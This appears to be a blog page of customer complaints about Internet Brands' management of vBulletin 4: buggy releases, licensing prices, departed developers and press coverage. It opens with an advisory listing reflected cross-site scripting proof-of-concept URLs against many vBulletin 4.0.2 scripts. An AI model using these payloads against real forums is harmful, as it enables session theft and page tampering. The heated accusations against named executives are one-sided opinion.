Security Alert: Multiple XSS Vulnerabilities in Internet Brands’s vBulletin 4 Forum and vBulletin 4 Suite

Vendor: Internet Brands (NASDAQ: INET)
Product: vBulletin 4 Forum, vBulletin 4 Suite
Version: 4.0.2
Vector of Attack: Cross Site Scripting
Source: Inje3ct0rvBulletin.com

Details:

# Exploit  :
http://127.0.0.1/upload/calendar.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/faq.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/forum.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/usercp.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/subscription.php?
acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/showthread.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/showgroups.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/sendmessage.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/search.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/register.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/profile.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/private.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/online.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/newthread.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/misc.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/memberlist.php?=>”‘><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/member.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/inlinemod.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/index.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/forumdisplay.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
Additional vulnerabilities found by vBulletin Forum Members
http://127.0.0.1/upload/content.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/blog.php/>”><ScRiPt>alert(213771818860)</ScRiPt>

We’re Back.. but vBulletin’s Not

Chronos and I both decided after vBulletin 4 went gold, we’d disappear into the shadows to do what we do best: observe. What have we observed during our writing absence? Chaos. Confusion. Backlash. Bugs. Customer Disappointment. Frustration. Disappointment.

As an auditor, I’ve been often asked to audit programs and the scope that’s been undertaken. I’ve also sat back occasionally as part of my audit scope to do a complete quality assurance check on software that is intended to be released into production. I find bugs and send them off to QA, but it has been an indicator to me as how a project is being managed, as well as an indicator to determine its current project state. It’s shameful that vBulletin 4 was released in such a state. The application itself shows too many signs of software bugs and glitches floating around all over the place. In my opinion, I would never have approved the release of vBulletin 4.

As I sit back and tinker in a closed beta environment on my localhost server, I could not and would not approve vBulletin 4 being utilized on any of my client’s sites (or my own for that matter). There is simply far too much risk involved in utilizing that’s still quite buggy.

My frustrations with Internet Brands is ever growing. As an auditor, I would likely be writing reports like mad and ensuring senior management is held accountable. However, seeing as I’m not Internet Brands auditor, my own position is one of a customer. As a customer, I am livid, furious, and insanely upset that Internet Brands would sell me a software that is flawed far worse than Windows Vista. More to the point, I’m extremely frustrated that senior management, in particular Bob Brisco, and Joe Rosenblum, have not taken responsibility, nor attempt to signal to stakeholders that this fiasco is being addressed and rectified. Instead, they’ve done their marketing campaign and have decided to hide from the wrath of customers.

I quite understand that software bugs are a part of any development of any application. I also understand it never will be perfect, but I’ve often chimed in my reports to various software companies that bugs need to be managed and controlled properly. If they ever become a significant issue, they can and will hinder functionality. Furthermore, they will cause backlash and create trust issues that will resonate for years to come.

The point of doing bug fixing is to get rid of those bugs. It’s to ensure the software is 99.99% functional for the most common setups.

Looking at some of the bug reports inside the Project Tools, several bugs I’ve found were documented AFTER the release of vBulletin 4 Gold. Some of these bugs are clearly obvious and are simply shameful as a 14 year old would have caught them. It’s appalling.

My question to you Internet Brands: Who did the quality assurance and wrote the quality assurance plan? It is obvious that QA wasn’t performed properly. It’s clear we’re paying more for vBulletin for more bugs, and less functional software.

vBulletin 4x – We Want More – ASAP!?

vBulletin 4x – We Want More – ASAP!? Or do we?

Let’s take a look back and do a quick review.

First we get the release of vBulletin 4.0 Gold. This build of vB 4.0.0 is plagued with bugs and known issues, yet it’s still released. Then we get vB 4.0.0 PL1, which is a release patch to fix a newly discovered exploit. This takes us to vB 4.0.1, which is a “maintenance release” that fixed 200+ bugs.
Finally, this brings us to 4.0.2, which was supposed to have been released February 4th, 2010 (now delayed).

The mentality used by IB is amusing, but not at all surprising. Instead of focusing on releasing a solid, stable build, they are merely pumping out versions as quickly as they can, and releasing them prematurely, even when they are clearly not ready to be deployed due to known bugs.

Only now with the delay of the 4.0.2 release have they actually held off releasing it to provide a more “quality” build. Maybe they finally learned their lesson that quality > quantity? We’ll soon find out.

@IB, you disappoint me, yet again. Dare I say, we told you so?
I would highly suggest you take a page out of the old vB team and focus on building a quality product. The old Jelsoft actually valued and knew the importance of releasing a solid build instead of just releasing as many, and bug filled versions as they could.

vBulletin 4 – Revolutionary or Disturbingly Flawed?

Twas the day before Christmas
and all through the net
vBulletin admins banging their heads
Installation’s has started for vBulletin 4
In hopes that it will succeed, once and for all

Once installed, the admins sighed in relief
and begins to tinker, then much to his disbelief
not one, but hundreds of bugs did appear
and it’s wrecked their Christmas cheer.

Then with a fury he curses at once
he runs for support just to fix the matter
To his surprise he’s not alone
that this bug was found long, long ago.

The poem’s a bit overly dramatic, but it’s rather fitting based on the struggles Chronos and I have seen this week. It’s been four days since vBulletin 4 came out, and it appears it has been a miserable four days. Bugs galor, customers crying foul, requirements not met (which is the biggest concern as any excellent systems developer would know you must achieve a good percentage of them). And the there’s the occasional cheer, and celebration saying vBulletin 4 is rather golden.

vBulletin is a marvelous product. vBulletin 4, however, leaves a bitter taste in my mouth. There are far too many mis-use cases that were not accounted for, thus breaking the entire information system.

I will be the first to say that we as customers should have held Internet Brands accountable. Clearly Internet Brands dropped the ball, and now we’re dealing with an incomplete, half-baked, second rate, forum and CMS.

I’m going to pose the question to everyone out there: What do you think of vBulletin 4? The blunt, brutal hard truth. Is it worth the price, time, and energy in buying, installing, and/or upgrading to? What would you tell to future investors? Or what would you tell to future customers?

Comment away.

Internet Brand’s Investment Nightmare: vBulletin

Internet Brands operates communities for anyone to speak. But more importantly, are they truly listening to their customers and what they are saying?
When dealing with any investment, there is risk. Does Internet Brands understand how much risk they've undertaken? Is Internet Brands those managing risks well?

I’ve often wondered why some the senior development team for vBulletin suddenly left without any advance warning. In one short month, Kier Darby, Mike Sullivan, and Scott Macvicar all left Internet Brands. In that one month, it represented a significant loss of talent, senior management, and senior development of vBulletin. These three represent the brains of vBulletin. They represent the integrity of vBulletin. They represent the key development and leadership of a industry icon. They understood customer’s requirements. They understood the customer. Last but not least, this trio understood vBulletin.

These questions have been racing in my mind. Why did they leave? What possible reasons could they have left? Was it because Internet Brands (Nasdaq: INET) acquired them? Was it because of management? Was it because they no longer liked working at Jelsoft and Internet Brands? Was it because they became merely a cog in this giant machine? Or maybe rather than job enlargement and enrichment, they experienced job reduction and dissatisfaction?

Finally, that silence has been broken. It appears what we’ve suspected all along happened. I hoped this wasn’t the case, however, my own nightmare, suspicions, and fears have been confirmed.

Internet Brands meddled where they should not have. They’ve roasted, and killed the goose that laid the golden eggs. It is the classic management case study in which employees leave because of management, not because of the company.

Read More

Ray Morgan Resigns!

Breaking News! Ray Morgan resigns as vBulletin General Manager.

Sincere thanks to the vBulletin community!

Greetings all,

As some of you know, my wife and I own property in Central America and have worked for the last few years toward building a home there. We are now in a position where we can begin construction, and that will require a lot of time on site and a great deal of travel.

Since my role in vBulletin can’t reasonably be filled from 3,000 miles away, the time has come for me to transition various responsibilities to my teammates. I will be with Team vB through this Friday, December 11.

These changes will not directly affect vBulletin customers. The rest of the team remains intact, and the most important things are not changing:

Kevin Sours will continue to run vBulletin’s large Engineering group, with backup from Joe Rosenblum, Internet Brands’s CTO.

Don Kuramura will continue to be responsible for Product Management, strategy, and business development.

Steve Machol will continue managing the Support team, with backup from Jennifer Rundell, Internet Brands’s VP of Content.

The path to building 4.0 out the door has been incredibly exciting, and all the more so to have done it alongside such a smart and dedicated team. (Each of them has a standing invitation to visit Lake Arenal!)

vBulletin is in very capable hands. The imminent release of 4.0 is just the beginning of some very exciting things ahead. The Internet evolves quickly, so in addition to new things like the Content Publishing Suite, Team vB are working on even bigger expansions, like products and services for big-board customers, vB for mobile, and more.

Again, a heartfelt thank you to the vBulletin community for all of your support.

Onward!

Our thoughts to come later.

The Real Faces Behind Internet Brands

Highway Robbery

I was tutoring this weekend and I helped an 11th grade high school student with US History.  He pointed out to me that history is useless, but I retorted that if we never learn from history, history has a tendency to repeat itself. That gave me reason to pause as I thought how that very logic applies to our scenario. Internet Brands did this once to us, what’s not to say they will do it again?

Let’s face the truth. I got my credit card bill last week, and it’s simply highway robbery. I cringed at the fact I had to pay just to do an upgrade. Sure $130.00 doesn’t seem much, but when you combine the fact that our license was suppose to be worth $160.00 (or $180.00 for others), we’re still paying more than $235.00 for a brand new license! What Internet Brands is making us pay is simply highway robbery. I don’t know how else to put it.

I don’t see ANY reason at all to justify existing license holders paying more. Essentially we’re being told to just pony up money for a brand new license. Forget what Internet Brands has told you; it’s merely a ploy, a cover. It’s purely marketing. Rip off all the marketing, and you’ll see is that we’re paying for a brand new license.

As existing Legacy vBulletin license holders, we’re treated as second rate citizens. We’re not important to them. Our wallets are more important to them. What’s not to say this is to happen again when vBulletin 5 arrives on the horizon?

We’re stuck holding a useless, absolutely pointless license vBulletin 3 license. After our license expires per-se, no more updates.  No more security patches. Once vBulletin 4 goes into full swing, vBulletin 3 citizens are treated as the scorn of the earth. Internet Brands manipulated us using fear tactics so that we’d buy licenses.

I really sympathize with those who bought vBulletin licenses really late in the game before vBulletin 4 was announced. Anyone who bought a license merely hours or days before vBulletin 4 got announced feel the real wrath. They bought a license only to have it invalidated and ripped from their hands minutes later.

Yet when they protest that they’ve been scammed, they’re told to upgrade to the latest vBulletin 4 License by paying even more? Any more protests, and you have threads closed. Has anyone checked out Pre-Sales recently? There are several threads in which customers point out that they don’t treat customers well.

Has anyone at Internet Brands done the math? We’re paying MORE for upgrading to a vBulletin 4 license than brand new vBulletin 4 license holders. Where’s the justice? Where’s the respect? More importantly, where’s the loyalty to your existing customer base that made vBulletin so successful? If they’re treating customers like this, as a shareholder, stakeholder or investors I’d wonder how Internet Brands may very well treat me in the future.

Let’s face it. vBulletin 3 license holders have been screwed over. If history has anything to say, it’s that it’s going to happen again.

A Look Back: Then and Now

It was in May 2009 when the world first became aware of the infamous vBulletin 4 leak. Forums and blogs all over the Internet had screenshots posted for the upcoming plans for vBulletin 4. This extensive thread contained future plans in terms of pricing, licensing changes, changes to support, the process of beta testing, and so on.
Let’s take a look at some of the proposed changes and what ended up happening.

Pricing:
The pricing changes that were brought up in the thread ended up happening.
vB4.0 Publishing Suite – New license: $285, Upgrade: $250
vB4.0 Forum Classic – New License: $195, Upgrade: “Free”.

Note, that I am intentionally leaving out the discounted “pre-order” prices, since there was no mention of these in the leaked thread.

Also keep in mind, the pricing above is for vB 4x. Upgrading to vB 5x will be an additional fee (notice a pattern here?) which has not yet been determined.

Support:
The change to support – These changes also ended up happening.
Although customers get access through the forums, the Forum Classic customers only get access through the support system for 30 days and they will be forced to pay extra if they need additional support through a ticket.

One major reason people chose vBulletin is because of the affordable prices in the past, and the excellent support that was offered through tickets and the forum, yet once again, IB is taking something that worked well, and engaging in price gouging, because they know they can by charging extra for the software itself and for support tickets.

Beta Testing:
In the past, when the times were good and we had original development team, open beta testing was something of the norm. This was important because it gave members to try out the software so they could get a head start on getting their communities ready. It was also important because members of the modding and skinning community were able to play with the software to prepare their products for the new version of vBulletin. All of this changed however with IB and the new development team. Beta access to vB4 was only given to a select handful of customers. Later after much controversy they decided to give members who pre-ordered it a chance to try the beta as well, but only because they were forced to, because of all negative attention, and this was a feeble attempt to “give back” to the community.

Impact:
News of this leak caused an upheaval. Most people were furious to hear about some of these planned changes. When the topic was brought up on the forums, it resulted in nothing but closed threads and IB simply ignored the subject, telling us to wait for “official word”.

In the leaked screenshots, Steve clearly states that if the situation is not handled correctly, it could cause a “negative impact” and he pretty much nailed it – yet even with this, they failed to transition correctly and failed to handle the situation accordingly. The last line regarding the customer issue is what makes this whole situation ironic: “If we want loyalty from our customers, then we should be loyal to them in return”.

IB had a chance to try and reassure their customers but failed to do so. People grew more and more frustrated and IB turning their heads in the opposite direction, continually ignoring the subject only added to this frustration. IB should have taken what they learned from the original leak to make changes, improve and do everything in their power to assure the community but they failed to do so.

Internet Brands, Lying Scumbags SAY WHAT!?!?!?!?!!! – !#@$%^&

In every story, there are two sides. There was a lot of criticism with people feeling that Internet Brands was not given a fair chance to comment in The Register’s recent article on vBulletin. Today, Internet Brands made their comment with The Register in a new article released today, and after reading it, I will have to say Internet Brands has hit a new low. Oh a new low indeed.

Earlier in the week, former core Jelsoft developer Scott Macvicar wrote on his Twitter “So sad to see the company I helped build up screw customers over. Glad I bailed when I did, funemployment rocks”  in a comment to the flood of tweets to the very first Register article on vBulletin.

vBulletin was definitely Scott’s baby. We know Scott for 7-8 years now and vBulletin was his pride and joy. I can honestly say I’ve never known a person like Scott who loves what he did. Let’s not forget he has our admiration and respect for the exact same time period and has been with vBulletin since the beginning.

But this a new low and a new low indeed. Legal council for Internet Brands, Patrick Stack dismissed Scott’s comment earlier today in The Register’s new article, saying that it is “not too worrisome” and that it came from a “disgruntled former employee.”

EXCUSE ME!?!? What are you smoking Mr. Stack!? Have you no shame?  YOU DID NOT JUST CALL SCOTT MACVICAR A DISGRUNTLED EMPLOYEE.

In my eyes, Mr. Stack has lead Internet Brands onto a powder keg. It will backfire if Internet Brands is not careful. If there’s ever a reason to pick a bone with Internet Brands, this would be one reason.  It’s rude to call Scott disgruntled. It’s disrespectful. It’s uncalled for a number of reasons.

Internet Brands just took a swipe at one of the most respected trio of management, leaders, and developers in the industry. This same trio also have the respect of the competition, including Invision Power Board’s lead developer Matt Mecham.  Let’s also not forget Scott’s extensive resume too. Not only was he a vBulletin developer,  he’s the lead developer of the SQLite3 Extension and the ImageMagick PHP wrapper. Plus he’s a former mentor for Google Summer of Code program.

The man’s a legend in short, and Internet Brands has an audacity to take a swipe at this guy? Scott knows what he’s doing, and he’s done it extremely well for the last several years. I can’t say the same for you Internet Brands. Talk about calling the kettle black. Look in the mirror sometime Internet Brands, and it might surprise you that you’re describing everything about yourself. If anything, Scott’s not a disgruntled employee; but rather he’s a smart and brilliant employee and has a far more comprehensive understanding of a customer than you currently have.

I hope investors are listening to this side of the fence. Internet Brands just lost a ton of respect in my eyes. It was bad enough they weren’t listening to us, but to backstab one of their former employees in an attempt to save face with the public? Wow. That’s just low.

If there’s ever a reason to leave Internet Brands as an employee, we most certainly found that reason. It’s the classic management case study in which employees don’t divorce the company, but rather they divorce management. Many of us wondered why Scott, Mike, and Kier left vBulletin, and I think we have a slightly more clear picture today.

Scott, we salute you. Let’s hope they don’t take a swipe at Kier or Mike next.

Some parting words from Scott in response to Patrick’s outlandish comments:

Disgruntled? I wouldn’t say I’m a disgruntled employee, I left on reasonable terms with the company and was answering questions for them just a few weeks ago. The fact that they’re simply ignoring customers is just shocking and it’s what troubles me the most.


Repost: The Register Writes About vBulletin Fiasco

image-1928-1News has come in that a well known on-line Internet “News Paper” called The Register, has written a damming article which highlights exactly what’s been going on over at vBulletin by Internet Brands. This is something Internet Brands will not be happy to see happen, and especially coming at a time when they’re trying to avoid any bad publicity while the pre-sale of their (not yet out) vBulletin 4 Suite is still on-going until the end of October 2009.

The article itself which was written by “Cade Metz in San Francisco” on behalf of The  Register, and quite amusingly titled the: Forum king vBulletin muzzles paid-up protesters. Highlights well most of the key points bothering vBulletin customers the most right now. “The Register” is hugely popular and read by millions of Internet users worldwide, meaning this is bad news indeed for Internet Brands at a very critical time in their sales.

To make matter much worse though for Internet Brands, other Internet users after reading the article are then using Social Networking sites like “Twitter and Digg” to highlight it much further to the World Wide Web masses. And so people can get easy access to read this very interesting article posted by “The Register” about Internet Brands and the troubled sale of vBulletin 4.

Quite an interesting read indeed, I’m sure you’ll agree. To which you can leave your comments below!